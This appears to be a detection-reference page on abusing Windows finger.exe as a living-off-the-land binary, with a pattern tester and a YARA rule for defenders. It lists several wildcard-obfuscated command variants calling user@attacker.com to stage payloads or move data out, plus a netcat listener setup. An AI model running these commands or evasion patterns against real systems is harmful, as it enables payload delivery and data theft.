finger
Legacy user info protocol client. Can retrieve arbitrary text from an attacker-controlled finger server, enabling data exfiltration and payload staging.
Binary Paths
C:\Windows\System32\finger.exe
Glob Patterns
| Pattern | Notes |
|---|---|
for /f %i in ('where fin*.exe') do %i user@attacker.com
|
Star matches 'ger' after 'fin' |
for /f %i in ('where f?nger.exe') do %i user@attacker.com
|
Single char wildcard replaces 'i' |
for /f %i in ('where f*r.exe') do %i user@attacker.com
|
Star matches 'inge' between 'f' and 'r' |
for /f %i in ('dir /b C:\Windows\System32\fin*.exe') do %i user@attacker.com
|
dir /b glob finds finger.exe in System32 |
forfiles /p C:\Windows\System32 /m fin*.exe /c "@file user@attacker.com"
|
forfiles * mask finds finger.exe — @file expands to matched filename |
C:\Windows\System32\finger.exe user@attacker.com
|
Direct invocation — response from attacker's finger server is printed to stdout |
for %i in (C:\Windows\System32\fin*.exe) do @%i user@attacker.com
|
Native CMD for loop with filesystem glob — expands fin*.exe directly in System32 without where.exe |
for /f %i in ('where /r C:\Windows\System32 fin*.exe') do %i user@attacker.com
|
Recursive where search — fin* matches finger.exe; scoped to System32 to avoid matching other tools |
Pattern Tester
$
Try typing finger or a full path like C:\Windows\System32\finger.exe
YARA Rule
Auto-generated detection rule for finger
Platform Notes
finger.exe is enabled on older/misconfigured Windows systems. It queries the RFC 1288 finger protocol (TCP/79). An attacker can run a netcat listener (nc -l -p 79) to serve arbitrary data. The response is printed to stdout and can be captured with for /f. In batch scripts use %%i instead of %i.